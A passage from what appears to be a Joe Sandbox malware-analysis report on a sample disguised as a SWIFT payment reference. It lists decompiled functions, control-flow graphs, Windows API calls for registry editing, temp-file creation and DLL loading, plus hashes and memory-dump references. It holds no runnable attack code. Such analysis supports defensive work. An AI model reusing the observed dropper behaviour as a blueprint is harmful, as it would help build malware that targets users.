                            • API String ID: 551687249-649311722
                            • Opcode ID: b7039df6b661f5aac7037f3c5cf5785396056a6690f2865472b97a0f4fde5ae6
                            • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                            • Opcode Fuzzy Hash: b7039df6b661f5aac7037f3c5cf5785396056a6690f2865472b97a0f4fde5ae6
                            • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 708 406864-406884 GetSystemDirectoryW 709 406886 708->709 710 406888-40688a 708->710 709->710 711 40689b-40689d 710->711 712 40688c-406895 710->712 713 40689e-4068d1 wsprintfW LoadLibraryExW 711->713 712->711 714 406897-406899 712->714 714->713
                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                            • wsprintfW.USER32 ref: 004068B6
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: DirectoryLibraryLoadSystemwsprintf
                            • String ID: %s%S.dll$UXTHEME$\
                            • API String ID: 2200240437-1946221925
                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                            • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                            • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 715 405a38-405a83 CreateDirectoryW 716 405a85-405a87 715->716 717 405a89-405a96 GetLastError 715->717 718 405ab0-405ab2 716->718 717->718 719 405a98-405aac SetFileSecurityW 717->719 719->716 720 405aae GetLastError 719->720 720->718
                            APIs
                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                            • GetLastError.KERNEL32 ref: 00405A8F
                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                            • GetLastError.KERNEL32 ref: 00405AAE
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 3449924974-3081826266
                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                            • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                            • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 721 402ea9-402ed2 call 406374 723 402ed7-402edb 721->723 724 402ee1-402ee5 723->724 725 402f8c-402f90 723->725 726 402ee7-402f08 RegEnumValueW 724->726 727 402f0a-402f1d 724->727 726->727 728 402f71-402f7f RegCloseKey 726->728 729 402f46-402f4d RegEnumKeyW 727->729 728->725 730 402f1f-402f21 729->730 731 402f4f-402f61 RegCloseKey call 4068d4 729->731 730->728 732 402f23-402f37 call 402ea9 730->732 737 402f81-402f87 731->737 738 402f63-402f6f RegDeleteKeyW 731->738 732->731 739 402f39-402f45 732->739 737->725 738->725 739->729
                            APIs
                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CloseEnum$DeleteValue
                            • String ID:
                            • API String ID: 1354259210-0
                            • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                            • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                            • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                            • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 740 401c43-401c63 call 402d84 * 2 745 401c65-401c6c call 402da6 740->745 746 401c6f-401c73 740->746 745->746 748 401c75-401c7c call 402da6 746->748 749 401c7f-401c85 746->749 748->749 752 401cd3-401cfd call 402da6 * 2 FindWindowExW 749->752 753 401c87-401ca3 call 402d84 * 2 749->753 763 401d03 752->763 764 401cc3-401cd1 SendMessageW 753->764 765 401ca5-401cc1 SendMessageTimeoutW 753->765 766 401d06-401d09 763->766 764->763 765->766 767 402c2a-402c39 766->767 768 401d0f 766->768 768->767
                            APIs
                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend$Timeout
                            • String ID: !
                            • API String ID: 1777923405-2657877971
                            • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                            • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                            • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                            • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 771 40248a-4024bb call 402da6 * 2 call 402e36 778 4024c1-4024cb 771->778 779 402c2a-402c39 771->779 781 4024cd-4024da call 402da6 lstrlenW 778->781 782 4024de-4024e1 778->782 781->782 785 4024e3-4024f4 call 402d84 782->785 786 4024f5-4024f8 782->786 785->786 787 402509-40251d RegSetValueExW 786->787 788 4024fa-402504 call 4032b4 786->788 792 402522-402603 RegCloseKey 787->792 793 40251f 787->793 788->787 792->779 796 40292e-402935 792->796 793->792 796->779
                            APIs
                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000023,00000011,00000002), ref: 004024D5
                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000000,00000011,00000002), ref: 00402515
                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000000,00000011,00000002), ref: 004025FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CloseValuelstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\nso1577.tmp
                            • API String ID: 2655323295-1657697054
                            • Opcode ID: 631a5d22b5e570bb7e3b4f1968826d0039bf86b5faa60468192ff02330da8f69
                            • Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
                            • Opcode Fuzzy Hash: 631a5d22b5e570bb7e3b4f1968826d0039bf86b5faa60468192ff02330da8f69
                            • Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetTickCount.KERNEL32 ref: 00406044
                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CountFileNameTempTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                            • API String ID: 1716503409-678247507
                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                            • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                            • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                              • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                            • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                            • GetFileAttributesW.KERNELBASE(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 3248276644-3081826266
                            • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                            • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                            • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                            • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
                            • RegCloseKey.KERNELBASE(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID: : Completed
                            • API String ID: 3356406503-2954849223
                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                            • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                            • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                            • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                            • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                            • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                            • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                            • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                            • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                            • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                            • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                            • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
